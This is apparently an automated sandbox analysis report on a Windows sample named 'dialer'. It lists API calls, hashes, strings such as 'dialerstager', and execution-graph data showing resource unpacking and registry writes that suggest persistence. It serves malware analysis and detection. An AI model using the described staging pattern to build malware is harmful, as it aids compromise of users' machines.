  • Part of subcall function 00000001400017EC: SysAllocString.OLEAUT32 ref: 0000000140001812
  • Part of subcall function 00000001400017EC: CoInitializeEx.COMBASE ref: 000000014000181F
  • Part of subcall function 00000001400017EC: CoInitializeSecurity.COMBASE ref: 0000000140001856
  • Part of subcall function 00000001400017EC: CoCreateInstance.COMBASE ref: 0000000140001896
  • Part of subcall function 00000001400017EC: VariantInit.OLEAUT32 ref: 00000001400018A8
  • Part of subcall function 00000001400017EC: CoUninitialize.COMBASE ref: 0000000140001942
  • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 000000014000194B
  • Part of subcall function 00000001400017EC: SysFreeString.OLEAUT32 ref: 0000000140001954
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011A7
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011B7
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011C7
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011D3
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011E3
  • Part of subcall function 000000014000117C: SysAllocString.OLEAUT32 ref: 00000001400011F3
  • Part of subcall function 000000014000117C: CoInitializeEx.OLE32 ref: 0000000140001200
  • Part of subcall function 000000014000117C: CoInitializeSecurity.COMBASE ref: 0000000140001237
  • Part of subcall function 000000014000117C: CoCreateInstance.COMBASE ref: 0000000140001279
  • Part of subcall function 000000014000117C: VariantInit.OLEAUT32 ref: 000000014000128B
  • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000162A
  • Part of subcall function 0000000140001614: SysAllocString.OLEAUT32 ref: 000000014000163A
  • Part of subcall function 0000000140001614: CoInitializeEx.OLE32 ref: 0000000140001647
  • Part of subcall function 0000000140001614: CoInitializeSecurity.COMBASE ref: 000000014000167E
  • Part of subcall function 0000000140001614: CoCreateInstance.COMBASE ref: 00000001400016BE
  • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 00000001400016D0
  • Part of subcall function 0000000140001614: VariantInit.OLEAUT32 ref: 0000000140001760
Strings
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: String$Alloc$Initialize$InitResourceVariant$CreateInstanceSecurity$FreeHeap$FindLoadLockOpenProcessSizeofUninitializeValue
• String ID: EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
• API String ID: 2204944113-1859800454
• Opcode ID: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
• Instruction ID: 1bfe2c02107bc6537b2911a47a34f854c4b6e53c22e939ebebcbb702dcfd335c
• Opcode Fuzzy Hash: 26ae1522833f5bd9fa9188c5454cc5176b5189f098da63ea7365dd9a7c369b54
• Instruction Fuzzy Hash: D5213BBA30570152EA26DF63B8143E963A1AB8DBD0F484125FB49477BAEF3CC604C600

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID:
• API String ID: 4184240511-0
• Opcode ID: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
• Instruction ID: 67cbc857c72eec62a5b69ac69888ab56890e3342390bd1f27bc6256027a28dd6
• Opcode Fuzzy Hash: 28fc60779f0ad9d62090849b4b365cf4f04873247535d29ba999af650a69468a
• Instruction Fuzzy Hash: 5E413972704A458AEB11CF7AE8543DD73B1FB89B99F449226AF4A47A69DF38C149C300

Control-flow Graph

[control-flow graph of 140001c0c: basic blocks 140001c0c-140001c99; calls lstrlenW, 140001070, StrStrIW (rendered graph not captured)]
APIs
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
• Instruction ID: 09bf7b72404f13f14ced639d6c0c6f67ee10a0461fa6ddbcf4aeef183f1f47ff
• Opcode Fuzzy Hash: b9962e4e84025f74c7544eb618daec881cae5e6da44291651d3163d6fd35675d
• Instruction Fuzzy Hash: 9B0116B6344B8185EA66CF13A804BA963AAF78CFC0F598131AE4D83765DF38D946C740

Control-flow Graph

[control-flow graph of 140001970: basic block 140001970-14000197b; calls 140001984, ExitProcess (rendered graph not captured)]
APIs
  • Part of subcall function 0000000140001984: FindResourceExA.KERNEL32(?,?,?,?,?,0000000140001979), ref: 000000014000199C
  • Part of subcall function 0000000140001984: SizeofResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019B3
  • Part of subcall function 0000000140001984: LoadResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019C8
  • Part of subcall function 0000000140001984: LockResource.KERNEL32(?,?,?,?,?,0000000140001979), ref: 00000001400019DA
  • Part of subcall function 0000000140001984: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A04
  • Part of subcall function 0000000140001984: RegSetValueExW.KERNELBASE(?,?,?,?,?,0000000140001979), ref: 0000000140001A2A
• ExitProcess.KERNEL32 ref: 000000014000197B
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
• String ID:
• API String ID: 3836967525-0
• Opcode ID: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
• Instruction ID: 591ae2b672e41714171671f8838f177bfce947d6885aae7fa81f753db4d17b5a
• Opcode Fuzzy Hash: ee2a5ee51357348344ca81a4be59069b68ca976694f2d9a0ce0cc3fee0d6cd3e
• Instruction Fuzzy Hash: 71A011B0A00A8082EA0ABBB2282A3E802200B88380F000000A202032A2CC38008A8A00

Control-flow Graph

[control-flow graph of 14000114c: basic blocks 14000114c-140001178; calls GetModuleHandleA, GetProcAddress (rendered graph not captured)]
APIs
Strings
Memory Dump Source
• Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlGetVersion$ntdll.dll
• API String ID: 1646373207-1489217083
• Opcode ID: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
• Instruction ID: 59613ef8418529ec4bc26aae3d36b02baf67a4f8cd1ada14fad478f70e9913c3
• Opcode Fuzzy Hash: cbe8274689d4b13bee11112ce4758f47015ade9fc57dadff247276a17ec4a5cd
• Instruction Fuzzy Hash: 8CD0E9F5622A01E1EA0BEB57FC553D512617B5C781F804521E70A43671EF3C8659C700

Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 897
Total number of Limit Nodes: 2
[execution graph: node/edge data for the 897 nodes above, covering functions in the 140001000-140006750 range; rendered graph not captured]
2430 14000154e 2429->2430 2431 140001394 2 API calls 2430->2431 2432 14000155d 2431->2432 2433 140001394 2 API calls 2432->2433 2434 14000156c 2433->2434 2435 140001394 2 API calls 2434->2435 2436 14000157b 2435->2436 2437 140001394 2 API calls 2436->2437 2438 14000158a 2437->2438 2439 140001394 2 API calls 2438->2439 2440 140001599 2439->2440 2441 140001394 2 API calls 2440->2441 2442 1400015a8 2441->2442 2443 140001394 2 API calls 2442->2443 2444 1400015b7 2443->2444 2445 140001394 2 API calls 2444->2445 2446 1400015c6 2445->2446 2447 140001394 2 API calls 2446->2447 2448 1400015d5 2447->2448 2449 140001394 2 API calls 2448->2449 2450 1400015e4 2449->2450 2451 140001394 2 API calls 2450->2451 2452 1400015f3 2451->2452 2452->2291 2453 14000156c 2452->2453 2454 140001394 2 API calls 2453->2454 2455 14000157b 2454->2455 2456 140001394 2 API calls 2455->2456 2457 14000158a 2456->2457 2458 140001394 2 API calls 2457->2458 2459 140001599 2458->2459 2460 140001394 2 API calls 2459->2460 2461 1400015a8 2460->2461 2462 140001394 2 API calls 2461->2462 2463 1400015b7 2462->2463 2464 140001394 2 API calls 2463->2464 2465 1400015c6 2464->2465 2466 140001394 2 API calls 2465->2466 2467 1400015d5 2466->2467 2468 140001394 2 API calls 2467->2468 2469 1400015e4 2468->2469 2470 140001394 2 API calls 2469->2470 2471 1400015f3 2470->2471 2471->2291 2472 14000145e 2471->2472 2473 140001394 2 API calls 2472->2473 2474 14000146d 2473->2474 2475 140001394 2 API calls 2474->2475 2476 14000147c 2475->2476 2477 140001394 2 API calls 2476->2477 2478 14000148b 2477->2478 2479 140001394 2 API calls 2478->2479 2480 14000149a 2479->2480 2481 140001394 2 API calls 2480->2481 2482 1400014a9 2481->2482 2483 140001394 2 API calls 2482->2483 2484 1400014b8 2483->2484 2485 140001394 2 API calls 2484->2485 2486 1400014c7 2485->2486 2487 140001394 2 API calls 2486->2487 2488 1400014d6 2487->2488 2489 1400014e5 2488->2489 2490 140001394 2 API calls 2488->2490 2491 140001394 2 API calls 2489->2491 
2490->2489 2492 1400014ef 2491->2492 2493 1400014f4 2492->2493 2494 140001394 2 API calls 2492->2494 2495 140001394 2 API calls 2493->2495 2494->2493 2496 1400014fe 2495->2496 2497 140001503 2496->2497 2498 140001394 2 API calls 2496->2498 2499 140001394 2 API calls 2497->2499 2498->2497 2500 14000150d 2499->2500 2501 140001394 2 API calls 2500->2501 2502 140001512 2501->2502 2503 140001394 2 API calls 2502->2503 2504 140001521 2503->2504 2505 140001394 2 API calls 2504->2505 2506 140001530 2505->2506 2507 140001394 2 API calls 2506->2507 2508 14000153f 2507->2508 2509 140001394 2 API calls 2508->2509 2510 14000154e 2509->2510 2511 140001394 2 API calls 2510->2511 2512 14000155d 2511->2512 2513 140001394 2 API calls 2512->2513 2514 14000156c 2513->2514 2515 140001394 2 API calls 2514->2515 2516 14000157b 2515->2516 2517 140001394 2 API calls 2516->2517 2518 14000158a 2517->2518 2519 140001394 2 API calls 2518->2519 2520 140001599 2519->2520 2521 140001394 2 API calls 2520->2521 2522 1400015a8 2521->2522 2523 140001394 2 API calls 2522->2523 2524 1400015b7 2523->2524 2525 140001394 2 API calls 2524->2525 2526 1400015c6 2525->2526 2527 140001394 2 API calls 2526->2527 2528 1400015d5 2527->2528 2529 140001394 2 API calls 2528->2529 2530 1400015e4 2529->2530 2531 140001394 2 API calls 2530->2531 2532 1400015f3 2531->2532 2532->2291 2534 140001394 2 API calls 2533->2534 2535 14000158a 2534->2535 2536 140001394 2 API calls 2535->2536 2537 140001599 2536->2537 2538 140001394 2 API calls 2537->2538 2539 1400015a8 2538->2539 2540 140001394 2 API calls 2539->2540 2541 1400015b7 2540->2541 2542 140001394 2 API calls 2541->2542 2543 1400015c6 2542->2543 2544 140001394 2 API calls 2543->2544 2545 1400015d5 2544->2545 2546 140001394 2 API calls 2545->2546 2547 1400015e4 2546->2547 2548 140001394 2 API calls 2547->2548 2549 1400015f3 2548->2549 2549->2365 2551 140001394 2 API calls 2550->2551 2552 1400015a8 2551->2552 2553 140001394 2 API calls 2552->2553 2554 1400015b7 
2553->2554 2555 140001394 2 API calls 2554->2555 2556 1400015c6 2555->2556 2557 140001394 2 API calls 2556->2557 2558 1400015d5 2557->2558 2559 140001394 2 API calls 2558->2559 2560 1400015e4 2559->2560 2561 140001394 2 API calls 2560->2561 2562 1400015f3 2561->2562 2562->2365 2564 140001394 2 API calls 2563->2564 2565 1400015b7 2564->2565 2566 140001394 2 API calls 2565->2566 2567 1400015c6 2566->2567 2568 140001394 2 API calls 2567->2568 2569 1400015d5 2568->2569 2570 140001394 2 API calls 2569->2570 2571 1400015e4 2570->2571 2572 140001394 2 API calls 2571->2572 2573 1400015f3 2572->2573 2573->2365 2575 140001394 2 API calls 2574->2575 2576 14000147c 2575->2576 2577 140001394 2 API calls 2576->2577 2578 14000148b 2577->2578 2579 140001394 2 API calls 2578->2579 2580 14000149a 2579->2580 2581 140001394 2 API calls 2580->2581 2582 1400014a9 2581->2582 2583 140001394 2 API calls 2582->2583 2584 1400014b8 2583->2584 2585 140001394 2 API calls 2584->2585 2586 1400014c7 2585->2586 2587 140001394 2 API calls 2586->2587 2588 1400014d6 2587->2588 2589 1400014e5 2588->2589 2590 140001394 2 API calls 2588->2590 2591 140001394 2 API calls 2589->2591 2590->2589 2592 1400014ef 2591->2592 2593 1400014f4 2592->2593 2594 140001394 2 API calls 2592->2594 2595 140001394 2 API calls 2593->2595 2594->2593 2596 1400014fe 2595->2596 2597 140001503 2596->2597 2598 140001394 2 API calls 2596->2598 2599 140001394 2 API calls 2597->2599 2598->2597 2600 14000150d 2599->2600 2601 140001394 2 API calls 2600->2601 2602 140001512 2601->2602 2603 140001394 2 API calls 2602->2603 2604 140001521 2603->2604 2605 140001394 2 API calls 2604->2605 2606 140001530 2605->2606 2607 140001394 2 API calls 2606->2607 2608 14000153f 2607->2608 2609 140001394 2 API calls 2608->2609 2610 14000154e 2609->2610 2611 140001394 2 API calls 2610->2611 2612 14000155d 2611->2612 2613 140001394 2 API calls 2612->2613 2614 14000156c 2613->2614 2615 140001394 2 API calls 2614->2615 2616 14000157b 2615->2616 2617 
140001394 2 API calls 2616->2617 2618 14000158a 2617->2618 2619 140001394 2 API calls 2618->2619 2620 140001599 2619->2620 2621 140001394 2 API calls 2620->2621 2622 1400015a8 2621->2622 2623 140001394 2 API calls 2622->2623 2624 1400015b7 2623->2624 2625 140001394 2 API calls 2624->2625 2626 1400015c6 2625->2626 2627 140001394 2 API calls 2626->2627 2628 1400015d5 2627->2628 2629 140001394 2 API calls 2628->2629 2630 1400015e4 2629->2630 2631 140001394 2 API calls 2630->2631 2632 1400015f3 2631->2632 2632->2332 2633 140001530 2632->2633 2634 140001394 2 API calls 2633->2634 2635 14000153f 2634->2635 2636 140001394 2 API calls 2635->2636 2637 14000154e 2636->2637 2638 140001394 2 API calls 2637->2638 2639 14000155d 2638->2639 2640 140001394 2 API calls 2639->2640 2641 14000156c 2640->2641 2642 140001394 2 API calls 2641->2642 2643 14000157b 2642->2643 2644 140001394 2 API calls 2643->2644 2645 14000158a 2644->2645 2646 140001394 2 API calls 2645->2646 2647 140001599 2646->2647 2648 140001394 2 API calls 2647->2648 2649 1400015a8 2648->2649 2650 140001394 2 API calls 2649->2650 2651 1400015b7 2650->2651 2652 140001394 2 API calls 2651->2652 2653 1400015c6 2652->2653 2654 140001394 2 API calls 2653->2654 2655 1400015d5 2654->2655 2656 140001394 2 API calls 2655->2656 2657 1400015e4 2656->2657 2658 140001394 2 API calls 2657->2658 2659 1400015f3 2658->2659 2659->2337 2659->2338 2661 140001394 2 API calls 2660->2661 2662 1400014b8 2661->2662 2663 140001394 2 API calls 2662->2663 2664 1400014c7 2663->2664 2665 140001394 2 API calls 2664->2665 2666 1400014d6 2665->2666 2667 1400014e5 2666->2667 2668 140001394 2 API calls 2666->2668 2669 140001394 2 API calls 2667->2669 2668->2667 2670 1400014ef 2669->2670 2671 1400014f4 2670->2671 2672 140001394 2 API calls 2670->2672 2673 140001394 2 API calls 2671->2673 2672->2671 2674 1400014fe 2673->2674 2675 140001503 2674->2675 2676 140001394 2 API calls 2674->2676 2677 140001394 2 API calls 2675->2677 2676->2675 2678 14000150d 
2677->2678 2679 140001394 2 API calls 2678->2679 2680 140001512 2679->2680 2681 140001394 2 API calls 2680->2681 2682 140001521 2681->2682 2683 140001394 2 API calls 2682->2683 2684 140001530 2683->2684 2685 140001394 2 API calls 2684->2685 2686 14000153f 2685->2686 2687 140001394 2 API calls 2686->2687 2688 14000154e 2687->2688 2689 140001394 2 API calls 2688->2689 2690 14000155d 2689->2690 2691 140001394 2 API calls 2690->2691 2692 14000156c 2691->2692 2693 140001394 2 API calls 2692->2693 2694 14000157b 2693->2694 2695 140001394 2 API calls 2694->2695 2696 14000158a 2695->2696 2697 140001394 2 API calls 2696->2697 2698 140001599 2697->2698 2699 140001394 2 API calls 2698->2699 2700 1400015a8 2699->2700 2701 140001394 2 API calls 2700->2701 2702 1400015b7 2701->2702 2703 140001394 2 API calls 2702->2703 2704 1400015c6 2703->2704 2705 140001394 2 API calls 2704->2705 2706 1400015d5 2705->2706 2707 140001394 2 API calls 2706->2707 2708 1400015e4 2707->2708 2709 140001394 2 API calls 2708->2709 2710 1400015f3 2709->2710 2710->2347 2711 140001440 2710->2711 2712 140001394 2 API calls 2711->2712 2713 14000144f 2712->2713 2714 140001394 2 API calls 2713->2714 2715 14000145e 2714->2715 2716 140001394 2 API calls 2715->2716 2717 14000146d 2716->2717 2718 140001394 2 API calls 2717->2718 2719 14000147c 2718->2719 2720 140001394 2 API calls 2719->2720 2721 14000148b 2720->2721 2722 140001394 2 API calls 2721->2722 2723 14000149a 2722->2723 2724 140001394 2 API calls 2723->2724 2725 1400014a9 2724->2725 2726 140001394 2 API calls 2725->2726 2727 1400014b8 2726->2727 2728 140001394 2 API calls 2727->2728 2729 1400014c7 2728->2729 2730 140001394 2 API calls 2729->2730 2731 1400014d6 2730->2731 2732 1400014e5 2731->2732 2733 140001394 2 API calls 2731->2733 2734 140001394 2 API calls 2732->2734 2733->2732 2735 1400014ef 2734->2735 2736 1400014f4 2735->2736 2737 140001394 2 API calls 2735->2737 2738 140001394 2 API calls 2736->2738 2737->2736 2739 1400014fe 2738->2739 2740 
140001503 2739->2740 2741 140001394 2 API calls 2739->2741 2742 140001394 2 API calls 2740->2742 2741->2740 2743 14000150d 2742->2743 2744 140001394 2 API calls 2743->2744 2745 140001512 2744->2745 2746 140001394 2 API calls 2745->2746 2747 140001521 2746->2747 2748 140001394 2 API calls 2747->2748 2749 140001530 2748->2749 2750 140001394 2 API calls 2749->2750 2751 14000153f 2750->2751 2752 140001394 2 API calls 2751->2752 2753 14000154e 2752->2753 2754 140001394 2 API calls 2753->2754 2755 14000155d 2754->2755 2756 140001394 2 API calls 2755->2756 2757 14000156c 2756->2757 2758 140001394 2 API calls 2757->2758 2759 14000157b 2758->2759 2760 140001394 2 API calls 2759->2760 2761 14000158a 2760->2761 2762 140001394 2 API calls 2761->2762 2763 140001599 2762->2763 2764 140001394 2 API calls 2763->2764 2765 1400015a8 2764->2765 2766 140001394 2 API calls 2765->2766 2767 1400015b7 2766->2767 2768 140001394 2 API calls 2767->2768 2769 1400015c6 2768->2769 2770 140001394 2 API calls 2769->2770 2771 1400015d5 2770->2771 2772 140001394 2 API calls 2771->2772 2773 1400015e4 2772->2773 2774 140001394 2 API calls 2773->2774 2775 1400015f3 2774->2775 2775->2347 2775->2356 2777 1400014e5 2776->2777 2778 140001394 2 API calls 2776->2778 2779 140001394 2 API calls 2777->2779 2778->2777 2780 1400014ef 2779->2780 2781 1400014f4 2780->2781 2782 140001394 2 API calls 2780->2782 2783 140001394 2 API calls 2781->2783 2782->2781 2784 1400014fe 2783->2784 2785 140001503 2784->2785 2786 140001394 2 API calls 2784->2786 2787 140001394 2 API calls 2785->2787 2786->2785 2788 14000150d 2787->2788 2789 140001394 2 API calls 2788->2789 2790 140001512 2789->2790 2791 140001394 2 API calls 2790->2791 2792 140001521 2791->2792 2793 140001394 2 API calls 2792->2793 2794 140001530 2793->2794 2795 140001394 2 API calls 2794->2795 2796 14000153f 2795->2796 2797 140001394 2 API calls 2796->2797 2798 14000154e 2797->2798 2799 140001394 2 API calls 2798->2799 2800 14000155d 2799->2800 2801 140001394 2 
API calls 2800->2801 2802 14000156c 2801->2802 2803 140001394 2 API calls 2802->2803 2804 14000157b 2803->2804 2805 140001394 2 API calls 2804->2805 2806 14000158a 2805->2806 2807 140001394 2 API calls 2806->2807 2808 140001599 2807->2808 2809 140001394 2 API calls 2808->2809 2810 1400015a8 2809->2810 2811 140001394 2 API calls 2810->2811 2812 1400015b7 2811->2812 2813 140001394 2 API calls 2812->2813 2814 1400015c6 2813->2814 2815 140001394 2 API calls 2814->2815 2816 1400015d5 2815->2816 2817 140001394 2 API calls 2816->2817 2818 1400015e4 2817->2818 2819 140001394 2 API calls 2818->2819 2820 1400015f3 2819->2820 2820->2384 2822 140001394 2 API calls 2821->2822 2823 140001530 2822->2823 2824 140001394 2 API calls 2823->2824 2825 14000153f 2824->2825 2826 140001394 2 API calls 2825->2826 2827 14000154e 2826->2827 2828 140001394 2 API calls 2827->2828 2829 14000155d 2828->2829 2830 140001394 2 API calls 2829->2830 2831 14000156c 2830->2831 2832 140001394 2 API calls 2831->2832 2833 14000157b 2832->2833 2834 140001394 2 API calls 2833->2834 2835 14000158a 2834->2835 2836 140001394 2 API calls 2835->2836 2837 140001599 2836->2837 2838 140001394 2 API calls 2837->2838 2839 1400015a8 2838->2839 2840 140001394 2 API calls 2839->2840 2841 1400015b7 2840->2841 2842 140001394 2 API calls 2841->2842 2843 1400015c6 2842->2843 2844 140001394 2 API calls 2843->2844 2845 1400015d5 2844->2845 2846 140001394 2 API calls 2845->2846 2847 1400015e4 2846->2847 2848 140001394 2 API calls 2847->2848 2849 1400015f3 2848->2849 2849->2384 2851 140001394 2 API calls 2850->2851 2852 140001431 2851->2852 2853 140001394 2 API calls 2852->2853 2854 140001440 2853->2854 2855 140001394 2 API calls 2854->2855 2856 14000144f 2855->2856 2857 140001394 2 API calls 2856->2857 2858 14000145e 2857->2858 2859 140001394 2 API calls 2858->2859 2860 14000146d 2859->2860 2861 140001394 2 API calls 2860->2861 2862 14000147c 2861->2862 2863 140001394 2 API calls 2862->2863 2864 14000148b 2863->2864 2865 
140001394 2 API calls 2864->2865 2866 14000149a 2865->2866 2867 140001394 2 API calls 2866->2867 2868 1400014a9 2867->2868 2869 140001394 2 API calls 2868->2869 2870 1400014b8 2869->2870 2871 140001394 2 API calls 2870->2871 2872 1400014c7 2871->2872 2873 140001394 2 API calls 2872->2873 2874 1400014d6 2873->2874 2875 1400014e5 2874->2875 2876 140001394 2 API calls 2874->2876 2877 140001394 2 API calls 2875->2877 2876->2875 2878 1400014ef 2877->2878 2879 1400014f4 2878->2879 2880 140001394 2 API calls 2878->2880 2881 140001394 2 API calls 2879->2881 2880->2879 2882 1400014fe 2881->2882 2883 140001503 2882->2883 2884 140001394 2 API calls 2882->2884 2885 140001394 2 API calls 2883->2885 2884->2883 2886 14000150d 2885->2886 2887 140001394 2 API calls 2886->2887 2888 140001512 2887->2888 2889 140001394 2 API calls 2888->2889 2890 140001521 2889->2890 2891 140001394 2 API calls 2890->2891 2892 140001530 2891->2892 2893 140001394 2 API calls 2892->2893 2894 14000153f 2893->2894 2895 140001394 2 API calls 2894->2895 2896 14000154e 2895->2896 2897 140001394 2 API calls 2896->2897 2898 14000155d 2897->2898 2899 140001394 2 API calls 2898->2899 2900 14000156c 2899->2900 2901 140001394 2 API calls 2900->2901 2902 14000157b 2901->2902 2903 140001394 2 API calls 2902->2903 2904 14000158a 2903->2904 2905 140001394 2 API calls 2904->2905 2906 140001599 2905->2906 2907 140001394 2 API calls 2906->2907 2908 1400015a8 2907->2908 2909 140001394 2 API calls 2908->2909 2910 1400015b7 2909->2910 2911 140001394 2 API calls 2910->2911 2912 1400015c6 2911->2912 2913 140001394 2 API calls 2912->2913 2914 1400015d5 2913->2914 2915 140001394 2 API calls 2914->2915 2916 1400015e4 2915->2916 2917 140001394 2 API calls 2916->2917 2918 1400015f3 2917->2918 2918->2384 2920 140001394 2 API calls 2919->2920 2921 140001440 2920->2921 2922 140001394 2 API calls 2921->2922 2923 14000144f 2922->2923 2924 140001394 2 API calls 2923->2924 2925 14000145e 2924->2925 2926 140001394 2 API calls 2925->2926 
2927 14000146d 2926->2927 2928 140001394 2 API calls 2927->2928 2929 14000147c 2928->2929 2930 140001394 2 API calls 2929->2930 2931 14000148b 2930->2931 2932 140001394 2 API calls 2931->2932 2933 14000149a 2932->2933 2934 140001394 2 API calls 2933->2934 2935 1400014a9 2934->2935 2936 140001394 2 API calls 2935->2936 2937 1400014b8 2936->2937 2938 140001394 2 API calls 2937->2938 2939 1400014c7 2938->2939 2940 140001394 2 API calls 2939->2940 2941 1400014d6 2940->2941 2942 1400014e5 2941->2942 2943 140001394 2 API calls 2941->2943 2944 140001394 2 API calls 2942->2944 2943->2942 2945 1400014ef 2944->2945 2946 1400014f4 2945->2946 2947 140001394 2 API calls 2945->2947 2948 140001394 2 API calls 2946->2948 2947->2946 2949 1400014fe 2948->2949 2950 140001503 2949->2950 2951 140001394 2 API calls 2949->2951 2952 140001394 2 API calls 2950->2952 2951->2950 2953 14000150d 2952->2953 2954 140001394 2 API calls 2953->2954 2955 140001512 2954->2955 2956 140001394 2 API calls 2955->2956 2957 140001521 2956->2957 2958 140001394 2 API calls 2957->2958 2959 140001530 2958->2959 2960 140001394 2 API calls 2959->2960 2961 14000153f 2960->2961 2962 140001394 2 API calls 2961->2962 2963 14000154e 2962->2963 2964 140001394 2 API calls 2963->2964 2965 14000155d 2964->2965 2966 140001394 2 API calls 2965->2966 2967 14000156c 2966->2967 2968 140001394 2 API calls 2967->2968 2969 14000157b 2968->2969 2970 140001394 2 API calls 2969->2970 2971 14000158a 2970->2971 2972 140001394 2 API calls 2971->2972 2973 140001599 2972->2973 2974 140001394 2 API calls 2973->2974 2975 1400015a8 2974->2975 2976 140001394 2 API calls 2975->2976 2977 1400015b7 2976->2977 2978 140001394 2 API calls 2977->2978 2979 1400015c6 2978->2979 2980 140001394 2 API calls 2979->2980 2981 1400015d5 2980->2981 2982 140001394 2 API calls 2981->2982 2983 1400015e4 2982->2983 2984 140001394 2 API calls 2983->2984 2985 1400015f3 2984->2985 2985->2384

Callgraph

[Call graph (text form of the rendered graph): Function_0000000140001000 through Function_00000001400068D0. Function_0000000140001394 is the common callee of the chain of small functions Function_0000000140001404 to Function_00000001400015F3 and itself calls Function_0000000140006620 and Function_00000001400068D0; Function_0000000140003240 and Function_00000001400027D0 fan out to most of the string-handling helpers.]

Control-flow Graph

[Control-flow graph: a single basic block 0x140001394-0x140001403 that calls 0x140006620, 0x1400068d0 and NtOpenKey]

APIs
• NtOpenKey.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
Memory Dump Source
• Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
• Instruction ID: a491f1afa2254d8e491352d0748b00eed3e2628b9b22ab978c5d7e1ef0c2ef5b
• Opcode Fuzzy Hash: 6be8016fb36f82c3da64a84c1529aa11406b64e43b79967214b429f8e454d36b
• Instruction Fuzzy Hash: B9F09DB2608B408AEA12DF62F85179A77A1F39C7C0F009919BBC853735DB38C190CB40

Control-flow Graph

[Control-flow graph: function 0x1400027d0 (basic blocks 0x1400027d0-0x140002fe4); calls memset, wcsncmp, wcscpy, wcscat and wcslen, plus the local functions 0x140002660, 0x140006610, 0x140001370, 0x14000155d, 0x1400014c7, 0x140001503, 0x1400014e5, 0x1400014a9, 0x1400014f4, 0x14000145e and 0x140001512]

APIs
Strings
